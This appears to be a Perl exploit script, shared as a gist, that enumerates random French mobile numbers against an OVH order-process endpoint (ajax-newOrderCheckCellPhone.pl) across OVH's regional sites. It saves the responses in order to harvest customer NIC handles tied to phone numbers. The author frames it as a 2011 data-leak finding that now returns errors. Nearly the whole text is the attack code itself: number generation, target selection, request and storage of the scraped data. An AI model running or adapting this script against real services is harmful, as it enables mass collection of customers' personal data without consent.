It's a Perl script created to exploit a #dataleak from ovh hoster. I was able to get Ovh.Users( Nic-Handles & GsmNumbers). Weakness was on this script : ovh.com/fr/cgi-bin/newOrder/ajax-newOrderCheckCellPhone.pl reached by the register process. Ovh-exploit.pl can be launched, but it's now returning errors. It's also creating ovh-data.txt & ovh-d…

ovh-exploit.pl

#-- Found in 2011 --
#-- Ovh DataViewer Perl Script --
#-- This Script Show the dataleak of the Ovh Register Process --
#-- Start
#-- Step 1 Generate Random GSM number --
#-- Step 2 Generate Random Target Selection by listed servers --
#-- Step 3 Request the Generated Target/GSM --
#-- Step 4 Store Result on ovh-data.txt or Issue on ovh-dbg.txt --
#-- End
#-- Posted @ https://gist.github.com/DamienChiboub/6085725/
 
 
#!/usr/bin/perl -W
use LWP;
use Switch;
 
 
#Step 1
#gsm random generation
my $a = int(rand(9));
my $b = int(rand(9));
my $c = int(rand(9));
my $d = int(rand(9));
my $e = int(rand(9));
my $f = int(rand(9));
my $g = int(rand(9));
my $h = int(rand(9));
 
#gsmprinted
my $gsmprinted = "06.$a$b.$c$d.$e$f.$g$h"; 
 
#gsmrequested
my $gsm = "$a$b$c$d$e$f$g$h";
 
#Step 2
#target random generation
my $rand = int(rand(14));
 
  switch ($rand) {
        case 0 { $url = "https://www.ovh-hosting.fi" }
        case 1 { $url = "https://www.ovh.de" }
        case 2 { $url = "https://www.ovh.co.uk" }
        case 3 { $url = "https://www.ovh.es" }
        case 4 { $url = "https://www.ovh.fr" }
        case 5 { $url = "https://www.ovh.com/fr" }
        case 6 { $url = "https://ca.ovh.com/ca/en" }
        case 7 { $url = "https://us.ovh.com/us" }
        case 8 { $url = "https://www.ovh.pl" }
        case 9 { $url = "https://www.ovh.it" }
        case 10 { $url = "https://www.ovh.pt" }
        case 11 { $url = "https://www.ovh.nl" }
        case 12 { $url = "https://www.ovh.cz" }
        case 13 { $url = "https://www.ovh.ie" }
        case 14 { $url = "https://www.ovh.lt" }
        else { print "previous case not true" }
}
print "\n";
print "----------------------------------------------------------------------- \n";
print "------------     Randomize Ovh TopLevelDomain Selector      ----------- \n";
print "\n";
print ".fi .de .co.uk .es .fr .com .com/ca .com/us .pl .it .pl .nl .cz .ie .lt \n";
print "\n";
print "----------------------------------------------------------------------- \n";
print "\n";
print "Fqdn => $url \n"; 
print "\n";
print "Gsm  => $gsmprinted \n";
 
 
my $addr = "$url/cgi-bin/newOrder/ajax-newOrderCheckCellPhone.pl?cellphone=(+336$gsm) \n";
 
 
print "Request $addr \n";
print "\n";
print "----------------------------------------------------------------------- \n";
my $browser = new LWP::UserAgent;
 
#Step 3
#request
my $request = new HTTP::Request( GET => "$addr" );
my $headers = $request->headers();
 
$headers->header( 'User-Agent','Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.2 (like Gecko)');
$headers->header('Referer', '/');
my $response = $browser->request($request);
 
#Step 4
#storage
if ($response->is_success){
  my $headers = $response->headers();
  open (Data, ">>ovh-data.txt") || die "Open ovh-data.txt issue : $!";
  print Data "06$gsm ";
  print Data "".$response->content. "";
  print Data " $addr \n";
  close Data || die "Close ovh-data.txt issue : $!";
  print "Downloaded \n";
} else {
  my $headers = $response->headers();
  open (Debug, ">>ovh-dbg.txt") || die "Open ovh-dbg.txt issue : $!";
  print Debug "06$gsm ";
  print Debug "".$response->status_line. "";
  print Debug " $addr \n";
  close Debug || die "Close ovh-dbg.txt issue : $!";  
  print "Bad Request \n";
}
 
#-- https://gist.github.com/DamienChiboub/6085725/